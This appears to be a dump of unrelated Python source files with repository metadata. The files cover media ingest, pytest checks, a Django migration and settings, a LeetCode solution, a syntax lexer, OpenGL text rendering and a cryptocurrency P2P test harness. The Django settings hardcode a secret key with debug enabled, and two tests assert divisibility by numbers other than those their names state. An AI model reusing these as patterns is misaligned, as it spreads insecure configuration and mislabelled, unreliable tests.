into the working directory / media directory'''
#class init
def __init__(self,_sourcedir,_destdir):
#setup logging for this child class
log = logging.getLogger(__name__)
ingest.mvrnm(self,_sourcedir,_destdir)
#Move and Rename as Necessary
def mvrnm(self,sourcedir,destdir):
'''this function ensures that no data is lost via file collisions as files are moved into the working dir
by renaming them with a .<unixdatetimestamp. addition to the existing filename'''
log.info("Ingest - Directory root: %s" % (sourcedir))
#ensure the source directory exists
if os.path.isdir(sourcedir):
#change parser to the sourcedir
#os.chdir(sourcedir)
#loop through contents of the ingest directory
for folder, subs, files in os.walk(sourcedir):
for filename in files:
#split the filename up
ext = os.path.splitext(filename)[1][1:]
newfile = os.path.splitext(filename)[0]
#rename the file with a unique timestamp based name
millis = int(round(time.time() * 1000))
newfilename = "%s.%s.%s" % (newfile, millis, ext)
log.info("Ingest - oldfilename: %s" % (filename))
log.info("Ingest - newfilename: %s" % (newfilename))
#new file path
filepath = "%s/%s" % (folder,filename)
ftime = time.gmtime(os.path.getmtime(filepath))
#create date based year and month directories as needed
ctime_dir = "%s/%s" % (str(ftime.tm_year), str(ftime.tm_mon))
dest_dir="%s/%s" % (destdir, ctime_dir)
dest="%s/%s/%s" % (destdir, ctime_dir, filename)
newdest= "%s/%s" % (dest_dir, newfilename)
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
if not os.path.exists(dest):
log.info('Ingest - Moving %s from %s to %s' % (ext,filename,dest))
shutil.move(filepath, dest)
else:
log.info("Ingest - Duplicate Name found - new path: %s" % (newdest) )
shutil.move(filepath, newdest)
else:
log.error("Ingest - Source Directory {} doesn't exist".format(sourcedir))
| [
"joel@joeljohnston.us"
] | joel@joeljohnston.us |
ea7f44f012d147d661ff5941b7511a9fb801b9d3 | bb54c528cf1bd4c67bfc12e893df0ef780f7cb53 | /pytestrough/test_rough2.py | 40bbb065dba6cc925e3a00a449b7a9fe71ab5945 | [] | no_license | saurabh-c1/git-pytest | 2f06cf150d211565a1e8054d54b2f93fa6f3a9dd | 360913a8507ab6e1e6bdc1c1479ec76239020fea | refs/heads/main | 2023-06-29T10:23:40.649047 | 2021-08-02T06:55:34 | 2021-08-02T06:55:34 | 391,834,548 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | import pytest
def test_total_divisible_by_6(input_total):
assert input_total % 5 == 0
def test_total_divisible_by_8(input_total):
assert input_total % 9 == 0
| [
"saurabhpubg619@gmail.com"
] | saurabhpubg619@gmail.com |
a844a6abd5e12660cde6c7a1c4e3ce55ba864b6f | af2478883c90a25d6652c382a0cf4c11961ada43 | /sony-egs/swbd_disfluency/switchboard_data/utils/prepare_data_BIO.py | 4d06d491b07e358b694e95ca7dbfb2e6da5ac04b | [] | no_license | sascho1993/asr-disfluency | 75191b3dd3bd8dc8d278fa1195394e9ba4ec7d04 | 37d5f4d3f2f5375916f5818e5f14aeed96c469ed | refs/heads/master | 2022-02-19T02:20:10.112306 | 2019-09-13T00:43:47 | 2019-09-13T00:43:47 | 205,149,095 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,597 | py | #!/usr/bin/env python
"""
The dialogAct corpus is taken as an input token by token.
"""
import re
utts = open("data/raw_text/all_utts_clean_apos","r")
out = open("data/labeled/switchboard_prepared_BIO", "w")
# true if word == '{', false if word == '}'
brace_comment = False
brace_comment_next = False
# true if word == '{D', false if word == '}' and discourse == True
discourse = False
discourse_next = False
# true if word == '{E', false if word == '}' and edit == True
edit = False
edit_next = False
# true if word == '{F', false if word == '}' and filled_pause == True
filled_pause = False
filled_pause_next = False
# true if word == '{C', false if word == '}' and coordinate == True
coordinate = False
coordinate_next = False
# true if word == '{A', false if word == '}' and aside == True
aside = False
aside_next = False
# true if word == '*[[', false if word == ']]' and ignore_ast == True
ignore_ast = False
# true if word == '<+', false if word == '+>' and ignore_plus_comment == True
ignore_plus_comment = False
# true if word == '<<', false if word == '>>' and ignore_noise == True
ignore_noise = False
reparandum = False
repair = False
beginning_edit = False
ip = False
# Count number of open brackets and number of pluses, they both get decreased when ']' is encountered.
# Both counts have to be zero again when beginning a new file
count = 0
plus_count = 0
ignore = ["-", "--", "#", "(("]
# slash units
su = ["-/", "/"]
# set to true to output a new line after each slash unit
split_sentence = True
bracket_open = 0
bracket_close = 0
# count words in sentence to enumerate them in output, each sentence starts with 1
word_number = 0
rm_count = 0
rr_count = 0
rm_rr_count = 0
prev_file_id = ""
prev_prev_file_id = ""
prev_utt_number = ""
prev_speaker_turn = ""
first_word = True
for line in utts:
file_id,utt = line.split(" ",1)
utt = utt.strip().split(" ")
speaker_turn = utt[0]
utt_number = utt[1]
# bracket is not closed until the end of the file
if prev_prev_file_id != "" and prev_prev_file_id != prev_file_id and count != 0:
print "Error: count is not zero.\t\t{}\t{}\t{}".format(prev_prev_file_id, prev_file_id, count)
# too many pluses or too little brackets in file
if prev_prev_file_id != "" and prev_prev_file_id != prev_file_id and plus_count != 0:
print "Error: plus count is not zero.\t\t{}\t{}\t{}".format(prev_prev_file_id, prev_file_id, plus_count)
# word count must be 0 at end of a file
if prev_prev_file_id != "" and prev_prev_file_id != prev_file_id and word_number != 0:
print "Error: word_number is not zero in new file.\t\t{}\t{}\t{}".format(prev_prev_file_id, prev_file_id, word_number)
for word in utt[2:]:
word = word.strip(".,?! \n\"")
# The script works with two words at each time step. Skip the first word.
if first_word == True:
prev_word = word
first_word = False
elif prev_word in ignore:
prev_word = word
elif prev_word in su:
if split_sentence == True:
word_number = 0
out.write("\n")
prev_word = word
else:
prev_word = word
elif re.match('<(/?[A-Z]*[a-z]*_?\-?[a-z]*\.?)+>', prev_word):
prev_word = word
#markers open
elif prev_word == "{D":
discourse = True
prev_word = word
elif prev_word == "{E":
edit = True
prev_word = word
elif prev_word == "{F":
filled_pause = True
prev_word = word
elif prev_word == "{C":
coordinate = True
prev_word = word
elif prev_word == "{A":
aside = True
prev_word = word
elif word == "{":
brace_comment = True
# comments like *[[ slash error ]]
elif prev_word == "*[[":
ignore_ast = True
prev_word = word
elif ignore_ast == True and prev_word != "]]":
prev_word = word
elif ignore_ast == True and prev_word == "]]":
ignore_ast = False
prev_word = word
elif re.match('\]\].*', prev_word) and ignore_ast == False:
print "Error: ignore_ast is already False.\t\tfile_id: {}\tspeaker_turn: {}".format(prev_file_id, speaker_turn)
prev_word = word
# comments like << faint >>
elif prev_word == "<<":
ignore_noise = True
prev_word = word
elif prev_word == ">>":
ignore_noise = False
prev_word = word
elif ignore_noise == True:
prev_word = word
# comments like <+ What to do about x +>
elif prev_word == "<+":
ignore_plus_comment = True
prev_word = word
elif prev_word == "+>":
ignore_plus_comment = False
prev_word = word
elif ignore_plus_comment == True:
prev_word = word
# disfluencies open
elif prev_word == "[":
reparandum = True
count += 1
bracket_open += 1
if repair == False:
beginning_edit = True
prev_word = word
elif prev_word == "+" and count > 1:
repair = True
plus_count += 1
if count == plus_count:
reparandum = False
prev_word = word
elif prev_word == "+" and count == 1:
repair = True
reparandum = False
plus_count += 1
prev_word = word
elif prev_word == "+" and count == 0:
print "Error: count is 0 when encountering +.\t\tfile_id: {}\tspeaker_turn: {}".format(file_id, speaker_turn)
prev_word = word
# disfluencies close
elif prev_word == "]" and count > 1:
count -= 1
plus_count -= 1
bracket_close += 1
if count != plus_count:
repair = False
else:
repair = True
prev_word = word
elif prev_word == "]" and count == 1:
count -= 1
plus_count -= 1
repair = False
bracket_close += 1
prev_word = word
elif prev_word == "]" and count == 0:
print "Error: word is ] when count is already 0.\t\tfile_id: {}\tspeaker_turn: {}".format(file_id, speaker_turn)
prev_word = word
elif prev_word == "+]" and count == 1:
count -= 1
reparandum = False
bracket_close += 1
prev_word = word
elif prev_word == "+]" and count == 0:
print "Error: word is +] when count is already 0\t\tfile_id: {}\tspeaker_turn: {}".format(file_id, speaker_turn)
prev_word = word
elif prev_word == "+]" and count > 1:
count -= 1
bracket_close += 1
if count == plus_count:
reparandum = False
prev_word = word
# check which attributes the word has
elif prev_word != "":
if discourse + edit + filled_pause + coordinate > 1:
print "Error: more than one marker is activated.\t\t{} {}\t{}\t{}".format(prev_file_id, prev_speaker_turn, prev_utt_number, prev_word)
prev_word = word
# skip } as a word to be investigated in order to make BE_IP detectable:
# [ {C and } + {C and } ]
elif word == "))":
pass
elif word == "}":
if discourse == True:
discourse_next = True
elif edit == True:
edit_next = True
elif filled_pause == True:
filled_pause_next = True
elif coordinate == True:
coordinate_next = True
elif aside == True:
aside_next = True
elif brace_comment == True:
brace_comment_next = True
else:
print "Error: marker closed when none was open.\t\tfile_id: {}\tspeaker_turn: {}".format(prev_file_id, speaker_turn)
else:
word_number += 1
marker = "D"*discourse + "E"*edit + "F"*filled_pause + "C"*coordinate
rm = int(reparandum == True)
rr = int(repair == True)
if plus_count > count:
print "Error: plus_count > count\t\tfile_id: {}\tspeaker_turn: {}".format(file_id,speaker_turn)
if bracket_open < bracket_close:
print "Error: bracket_open < bracket_close\t\tfile_id: {}\tspeaker_turn: {}".format(file_id,speaker_turn)
if discourse_next == True:
discourse_next = False
discourse = False
elif edit_next == True:
edit_next = False
edit = False
elif filled_pause_next == True:
filled_pause_next = False
filled_pause = False
elif coordinate_next == True:
coordinate_next = False
coordinate = False
elif aside_next == True:
aside_next = False
aside = False
elif brace_comment_next == True:
brace_comment_next = False
brace_comment = False
continue
# flags are turned into BIO tags
if reparandum == False and repair == False:
edit_type = "O"
else:
if beginning_edit == True:
beginning_edit = False
if reparandum == True and repair != True:
if word == "+" or word == "+]":
edit_type = "BE_IP"
else:
edit_type = "BE"
elif reparandum == True and repair == True:
edit_type = "C_IE"
elif repair == True:
print "Error: only repair at edit beginning"
else:
if word == "+" or word == "+]":
if reparandum == True and repair == False:
edit_type = "IP"
elif reparandum == True and repair == True:
edit_type = "C_IP"
else:
if reparandum == True and repair == False:
edit_type = "IE"
elif reparandum == True and repair == True:
if word == "]":
edit_type = "C_IP"
else:
edit_type = "C_IE"
elif repair == True:
edit_type = "C"
out.write("{}\t{}\t{}\t{}\t{}\t{}\t{}\n".format(str(word_number), prev_file_id, prev_speaker_turn, prev_utt_number, prev_word.lower(), edit_type, marker))
prev_word = word
else:
prev_word = word
prev_prev_file_id = prev_file_id
prev_file_id = file_id
prev_utt_number = utt_number
prev_speaker_turn = speaker_turn
utts.close()
out.close()
| [
"sarah.schopper@sony.com"
] | sarah.schopper@sony.com |
72ecb3e1df744f2155f19fcb8e4ff558b31de014 | e9987d8b88c39c56281c9553142c3a36c66086c5 | /mysite/search/migrations/0002_milestone_b_data.py | db317fc750a6c2aeaf6980ef8bf5b89b35116a15 | [] | no_license | rafpaf/OpenHatch | 43efad73a9cd7d913285e431ce5a021a1f0cb234 | 2f84ee1d572bb07cbd27e755ecfe786bc09effe1 | refs/heads/master | 2016-09-05T14:47:14.654445 | 2010-06-11T17:20:56 | 2010-06-11T17:23:30 | 687,353 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,093 | py |
from south.db import db
from django.db import models
from mysite.search.models import *
class Migration:
def forwards(self, orm):
# Adding field 'Bug.submitter_realname'
db.add_column('search_bug', 'submitter_realname', models.CharField(max_length=200))
# Adding field 'Project.icon_url'
db.add_column('search_project', 'icon_url', models.URLField(max_length=200))
# Adding field 'Bug.last_touched'
db.add_column('search_bug', 'last_touched', models.DateField())
# Adding field 'Bug.importance'
db.add_column('search_bug', 'importance', models.CharField(max_length=200))
# Adding field 'Bug.people_involved'
db.add_column('search_bug', 'people_involved', models.IntegerField())
# Adding field 'Bug.last_polled'
db.add_column('search_bug', 'last_polled', models.DateField())
# Adding field 'Bug.submitter_username'
db.add_column('search_bug', 'submitter_username', models.CharField(max_length=200))
def backwards(self, orm):
# Deleting field 'Bug.submitter_realname'
db.delete_column('search_bug', 'submitter_realname')
# Deleting field 'Project.icon_url'
db.delete_column('search_project', 'icon_url')
# Deleting field 'Bug.last_touched'
db.delete_column('search_bug', 'last_touched')
# Deleting field 'Bug.importance'
db.delete_column('search_bug', 'importance')
# Deleting field 'Bug.people_involved'
db.delete_column('search_bug', 'people_involved')
# Deleting field 'Bug.last_polled'
db.delete_column('search_bug', 'last_polled')
# Deleting field 'Bug.submitter_username'
db.delete_column('search_bug', 'submitter_username')
models = {
'search.project': {
'icon_url': ('models.URLField', [], {'max_length': '200'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'language': ('models.CharField', [], {'max_length': '200'}),
'name': ('models.CharField', [], {'max_length': '200'})
},
'search.bug': {
'description': ('models.TextField', [], {}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'importance': ('models.CharField', [], {'max_length': '200'}),
'last_polled': ('models.DateField', [], {}),
'last_touched': ('models.DateField', [], {}),
'people_involved': ('models.IntegerField', [], {}),
'project': ('models.ForeignKey', ['Project'], {}),
'status': ('models.CharField', [], {'max_length': '200'}),
'submitter_realname': ('models.CharField', [], {'max_length': '200'}),
'submitter_username': ('models.CharField', [], {'max_length': '200'}),
'title': ('models.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['search']
| [
"asheesh@openhatch.org"
] | asheesh@openhatch.org |
a865e9f10130569267073fa37a1314786a38c6bb | 8efd8bcd3945d88370f6203e92b0376ca6b41c87 | /problems1_100/79_ Word_Search.py | 5374317283275085258b340378ccd5eef61390f0 | [] | no_license | Provinm/leetcode_archive | 732ad1ef5dcdfdde6dd5a33522e86f7e24ae2db5 | 3e72dcaa579f4ae6f587898dd316fce8189b3d6a | refs/heads/master | 2021-09-21T08:03:31.427465 | 2018-08-22T15:58:30 | 2018-08-22T15:58:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,465 | py |
'''
Given a 2D board and a word, find if the word exists in the grid.
The word can be constructed from letters of sequentially adjacent cell, where "adjacent" cells are those horizontally or vertically neighboring. The same letter cell may not be used more than once.
For example,
Given board =
[
['A','B','C','E'],
['S','F','C','S'],
['A','D','E','E']
]
word = "ABCCED", -> returns true,
word = "SEE", -> returns true,
word = "ABCB", -> returns false.
'''
class Solution(object):
Routes = []
def exist(self, board, word):
"""
:type board: List[List[str]]
:type word: str
:rtype: bool
"""
if not word: return True
for i in self.get_first_pos(board, word[0]):
next_pos = i
if self.sub_exist(next_pos, board, word, tem=[next_pos]):
return True
return False
def sub_exist(self, ini, board, word, tem, deep=1):
print('deep={}, tem={}'.format(deep, tem))
if not word[deep:]:
return True
tem_r = self.get_next_pos(board, word[deep], ini, tem)
# print('ini={}, tem_r={}'.format(ini, tem_r))
if not tem_r:
return False
for i in tem_r:
deep += 1
tem.append(i)
if self.sub_exist(i, board, word, tem, deep):
return True
deep -= 1
tem = tem[:deep]
def get_first_pos(self, board, word):
for row in range(len(board)):
for col in range(len(board[0])):
if board[row][col] == word:
yield (row, col)
def get_next_pos(self, board, word, pos, tem):
row, col = pos
left, top = (row, col-1), (row-1, col)
right, down = (row, col+1), (row+1, col)
res = []
for p in [i for i in [left, top, right, down] if self.valid_pos(board, i)]:
if board[p[0]][p[1]] == word and p not in tem:
res.append(p)
return res
def valid_pos(self, board, pos):
max_row = len(board)
max_col = len(board[0])
row, col = pos
if 0 <= row < max_row and \
0 <= col < max_col:
return True
else:
return False
s = Solution()
board = [["A","B","C","E"],
["S","F","E","S"],
["A","D","E","E"]]
word = "ABCESEEEFS"
print(s.exist(board, word)) | [
"zhouxin@gmail.com"
] | zhouxin@gmail.com |
18028c230886e9e8c2509cb6022d011a13447727 | 59be46f6d65a757e2f52cbaf9ae6f8e13d76b459 | /docs/highlighting.py | 601d1ca08a11871f04a9813e2a4ea95b1f278a8f | [
"MIT"
] | permissive | gitter-badger/jam-1 | fb310c52d0a968c307e41e49ff1050852637c267 | b47f8e8f316b87717b9a94e5bf92c373f3840cfc | refs/heads/master | 2021-01-21T02:46:23.239759 | 2015-06-20T08:52:10 | 2015-06-20T08:52:10 | 37,979,006 | 0 | 0 | null | 2015-06-24T10:48:14 | 2015-06-24T10:48:14 | null | UTF-8 | Python | false | false | 1,889 | py | from pygments.lexer import RegexLexer, bygroups, include, combined
from pygments.token import *
import sphinx
class JamLexer(RegexLexer):
name = "Jam"
aliases = ["jam"]
filenames = ["*.jm"]
INTEGER_REGEX = "[0-9]([0-9_]*[0-9])?"
tokens = {
'root': [
("#.*?$", Comment),
include('keywords'),
include('builtins'),
include('constants'),
(INTEGER_REGEX, Literal.Number),
("{0}\.({0})?".format(INTEGER_REGEX), Literal.Number),
("({0})?\.{0}".format(INTEGER_REGEX), Literal.Number),
("\"(.*)?\"", Literal.String),
("\(", Text, '#push'),
("\)", Text, '#pop'),
(" ", Text.Whitespace),
include('operators'),
("([a-zA-Z_][a-zA-Z_0-9]*)", Name),
],
'keywords': [(i, Keyword) for i in [
"end",
"def",
"class",
"template",
"if",
"elif",
"else",
"while",
"for",
"in",
"as",
"import",
]],
'constants': [(i, Keyword.Constant) for i in [
"true",
"false",
"null",
]],
'builtins': [(i, Name.Builtin) for i in [
"print",
]],
'operators': [(i, Operator) for i in [
"~",
"~",
"!",
"%",
"\^",
"&",
"&&",
"\*",
"\*\*",
"-",
"-=",
"\+",
"\+=",
"=",
"==",
"!=",
"\|",
"\|\|",
":",
"\?",
"<",
"<=",
">",
">=",
"\.",
"/",
"//",
]],
}
| [
"ben.schaaf@gmail.com"
] | ben.schaaf@gmail.com |
0439defe8752fffdbcf6387b54905d6a4105b6d1 | 8235ed1728df3c963d890b28835bd0136bd14b94 | /mysite/settings.py | 1ee1ec79ad2fa830c1b96e0a2f45b321a6106ef1 | [] | no_license | mirjpirj/first_project | 6d6432f9b28a74e1a9bb83b1cd8583f74d5264a2 | 2e333f401158f1bb23c9b11a8b807afe176993a8 | refs/heads/master | 2021-01-13T12:18:51.885869 | 2016-09-24T15:52:47 | 2016-09-24T15:52:47 | 69,110,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,224 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.9.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ti11yx5zu6_i*a256j$7-6euullt$^*tf@511je+@+ky!@_md&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog'
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"localchadmin@dhcp-20-44.public.unibe.ch"
] | localchadmin@dhcp-20-44.public.unibe.ch |
35a358b8f5e921d8af7f261da78fb3b3df4cec86 | 56ac2b986f6ed4a13b7cbeede7640d0892a3e27c | /lessons/while-loop.py | 6f6b715b6559bd95d88b5713f9704a228d62328d | [] | no_license | alexeahn/UNC-comp110 | da8b689cebd6a1cda4132b93546465fcf1d25126 | 2e9ab74969375e6cdc1cb5c4d3d75ad4a6652d7c | refs/heads/main | 2023-08-28T20:26:53.299997 | 2021-11-15T00:14:25 | 2021-11-15T00:14:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 306 | py | """An example of while-loop statement"""
counter: int = 0
maximum: int = int(input("Count up to, but not including what?"))
while counter < maximum:
counter_squared: int = counter ** 2
print("The square of " + str(counter) + " is " + str(counter_squared))
counter = counter + 1
print("Done!") | [
"alexeahn@ad.unc.edu"
] | alexeahn@ad.unc.edu |
5b47c3c2b52d34c4a77fd8f010eb34f1a1d7b933 | d8fb1264d21134442e2926a318262e9cd6f81241 | /math2d_text.py | d6e29960064a5938eb0ee7272eabefb8de97f5f2 | [
"MIT"
] | permissive | spencerparkin/pyMath2D | 0eb6563cacb89050d479de78a567912593783b39 | 0364afc137fd09f2363b426840c5448aaa5342bd | refs/heads/master | 2022-10-24T17:03:33.175095 | 2022-09-26T07:59:18 | 2022-09-26T07:59:18 | 135,310,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,128 | py | # math2d_text.py
from math2d_aa_rect import AxisAlignedRectangle
from OpenGL.GLUT import *
from OpenGL.GL import *
class TextRenderer(object):
def __init__(self, font=None):
self.font = GLUT_STROKE_ROMAN if font is None else font
def render_text(self, text, rect):
total_width = 0.0
for char in text:
width = glutStrokeWidth(self.font, ord(char))
total_width += float(width)
text_rect = AxisAlignedRectangle()
text_rect.min_point.x = 0.0
text_rect.max_point.x = total_width
text_rect.min_point.y = 0.0
text_rect.max_point.y = 119.05
original_height = text_rect.Height()
text_rect.ExpandToMatchAspectRatioOf(rect)
height = text_rect.Height()
scale = rect.Width() / text_rect.Width()
glPushMatrix()
try:
glTranslatef(rect.min_point.x, rect.min_point.y + (height - original_height) * 0.5 * scale, 0.0)
glScalef(scale, scale, 1.0)
for char in text:
glutStrokeCharacter(self.font, ord(char))
finally:
glPopMatrix() | [
"stparkin@mmm.com"
] | stparkin@mmm.com |
55312ac2de2ac26a3f54ff7cc5391ae286b1dafd | c6d14d4eb5722839e811ad4f6098b10aec917b63 | /qa/rpc-tests/test_framework/mininode.py | a41e2b410ae824ca5d3a18730b0d539856adc4c2 | [
"MIT"
] | permissive | KredsBlockchain/kreds-core | 74603364bc3c515c1064e3073aa7072837a8f643 | 1b549a1489d8e3612ce3087aa3fca70bc3d53786 | refs/heads/master | 2018-12-22T16:20:33.578411 | 2018-11-12T10:35:06 | 2018-11-12T10:35:06 | 120,257,608 | 14 | 16 | MIT | 2018-09-27T22:35:15 | 2018-02-05T05:08:06 | C++ | UTF-8 | Python | false | false | 55,192 | py | #!/usr/bin/env python3
# Copyright (c) 2010 ArtForz -- public domain half-a-node
# Copyright (c) 2012 Jeff Garzik
# Copyright (c) 2010-2016 The Kreds Developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# mininode.py - Kreds P2P network half-a-node
#
# This python code was modified from ArtForz' public domain half-a-node, as
# found in the mini-node branch of http://github.com/jgarzik/pynode.
#
# NodeConn: an object which manages p2p connectivity to a kreds node
# NodeConnCB: a base class that describes the interface for receiving
# callbacks with network messages from a NodeConn
# CBlock, CTransaction, CBlockHeader, CTxIn, CTxOut, etc....:
# data structures that should map to corresponding structures in
# kreds/primitives
# msg_block, msg_tx, msg_headers, etc.:
# data structures that represent network messages
# ser_*, deser_*: functions that handle serialization/deserialization
import struct
import socket
import asyncore
import time
import sys
import random
from .util import hex_str_to_bytes, bytes_to_hex_str
from io import BytesIO
from codecs import encode
import hashlib
from threading import RLock
from threading import Thread
import logging
import copy
from test_framework.siphash import siphash256
BIP0031_VERSION = 60000
MY_VERSION = 70014 # past bip-31 for ping/pong
MY_SUBVERSION = b"/python-mininode-tester:0.0.3/"
MY_RELAY = 1 # from version 70001 onwards, fRelay should be appended to version messages (BIP37)
MAX_INV_SZ = 50000
MAX_BLOCK_BASE_SIZE = 1000000
COIN = 100000000 # 1 btc in satoshis
NODE_NETWORK = (1 << 0)
NODE_GETUTXO = (1 << 1)
NODE_BLOOM = (1 << 2)
NODE_WITNESS = (1 << 3)
# Keep our own socket map for asyncore, so that we can track disconnects
# ourselves (to workaround an issue with closing an asyncore socket when
# using select)
mininode_socket_map = dict()
# One lock for synchronizing all data access between the networking thread (see
# NetworkThread below) and the thread running the test logic. For simplicity,
# NodeConn acquires this lock whenever delivering a message to to a NodeConnCB,
# and whenever adding anything to the send buffer (in send_message()). This
# lock should be acquired in the thread running the test logic to synchronize
# access to any data shared with the NodeConnCB or NodeConn.
mininode_lock = RLock()
# Serialization/deserialization tools
def sha256(s):
return hashlib.new('sha256', s).digest()
def ripemd160(s):
return hashlib.new('ripemd160', s).digest()
def hash256(s):
return sha256(sha256(s))
def ser_compact_size(l):
r = b""
if l < 253:
r = struct.pack("B", l)
elif l < 0x10000:
r = struct.pack("<BH", 253, l)
elif l < 0x100000000:
r = struct.pack("<BI", 254, l)
else:
r = struct.pack("<BQ", 255, l)
return r
def deser_compact_size(f):
nit = struct.unpack("<B", f.read(1))[0]
if nit == 253:
nit = struct.unpack("<H", f.read(2))[0]
elif nit == 254:
nit = struct.unpack("<I", f.read(4))[0]
elif nit == 255:
nit = struct.unpack("<Q", f.read(8))[0]
return nit
def deser_string(f):
nit = deser_compact_size(f)
return f.read(nit)
def ser_string(s):
return ser_compact_size(len(s)) + s
def deser_uint256(f):
r = 0
for i in range(8):
t = struct.unpack("<I", f.read(4))[0]
r += t << (i * 32)
return r
def ser_uint256(u):
rs = b""
for i in range(8):
rs += struct.pack("<I", u & 0xFFFFFFFF)
u >>= 32
return rs
def uint256_from_str(s):
r = 0
t = struct.unpack("<IIIIIIII", s[:32])
for i in range(8):
r += t[i] << (i * 32)
return r
def uint256_from_compact(c):
nbytes = (c >> 24) & 0xFF
v = (c & 0xFFFFFF) << (8 * (nbytes - 3))
return v
def deser_vector(f, c):
nit = deser_compact_size(f)
r = []
for i in range(nit):
t = c()
t.deserialize(f)
r.append(t)
return r
# ser_function_name: Allow for an alternate serialization function on the
# entries in the vector (we use this for serializing the vector of transactions
# for a witness block).
def ser_vector(l, ser_function_name=None):
r = ser_compact_size(len(l))
for i in l:
if ser_function_name:
r += getattr(i, ser_function_name)()
else:
r += i.serialize()
return r
def deser_uint256_vector(f):
nit = deser_compact_size(f)
r = []
for i in range(nit):
t = deser_uint256(f)
r.append(t)
return r
def ser_uint256_vector(l):
r = ser_compact_size(len(l))
for i in l:
r += ser_uint256(i)
return r
def deser_string_vector(f):
nit = deser_compact_size(f)
r = []
for i in range(nit):
t = deser_string(f)
r.append(t)
return r
def ser_string_vector(l):
r = ser_compact_size(len(l))
for sv in l:
r += ser_string(sv)
return r
def deser_int_vector(f):
nit = deser_compact_size(f)
r = []
for i in range(nit):
t = struct.unpack("<i", f.read(4))[0]
r.append(t)
return r
def ser_int_vector(l):
r = ser_compact_size(len(l))
for i in l:
r += struct.pack("<i", i)
return r
# Deserialize from a hex string representation (eg from RPC)
def FromHex(obj, hex_string):
obj.deserialize(BytesIO(hex_str_to_bytes(hex_string)))
return obj
# Convert a binary-serializable object to hex (eg for submission via RPC)
def ToHex(obj):
return bytes_to_hex_str(obj.serialize())
# Objects that map to kredsd objects, which can be serialized/deserialized
class CAddress(object):
def __init__(self):
self.nServices = 1
self.pchReserved = b"\x00" * 10 + b"\xff" * 2
self.ip = "0.0.0.0"
self.port = 0
def deserialize(self, f):
self.nServices = struct.unpack("<Q", f.read(8))[0]
self.pchReserved = f.read(12)
self.ip = socket.inet_ntoa(f.read(4))
self.port = struct.unpack(">H", f.read(2))[0]
def serialize(self):
r = b""
r += struct.pack("<Q", self.nServices)
r += self.pchReserved
r += socket.inet_aton(self.ip)
r += struct.pack(">H", self.port)
return r
def __repr__(self):
return "CAddress(nServices=%i ip=%s port=%i)" % (self.nServices,
self.ip, self.port)
MSG_WITNESS_FLAG = 1<<30
class CInv(object):
typemap = {
0: "Error",
1: "TX",
2: "Block",
1|MSG_WITNESS_FLAG: "WitnessTx",
2|MSG_WITNESS_FLAG : "WitnessBlock",
4: "CompactBlock"
}
def __init__(self, t=0, h=0):
self.type = t
self.hash = h
def deserialize(self, f):
self.type = struct.unpack("<i", f.read(4))[0]
self.hash = deser_uint256(f)
def serialize(self):
r = b""
r += struct.pack("<i", self.type)
r += ser_uint256(self.hash)
return r
def __repr__(self):
return "CInv(type=%s hash=%064x)" \
% (self.typemap[self.type], self.hash)
class CBlockLocator(object):
def __init__(self):
self.nVersion = MY_VERSION
self.vHave = []
def deserialize(self, f):
self.nVersion = struct.unpack("<i", f.read(4))[0]
self.vHave = deser_uint256_vector(f)
def serialize(self):
r = b""
r += struct.pack("<i", self.nVersion)
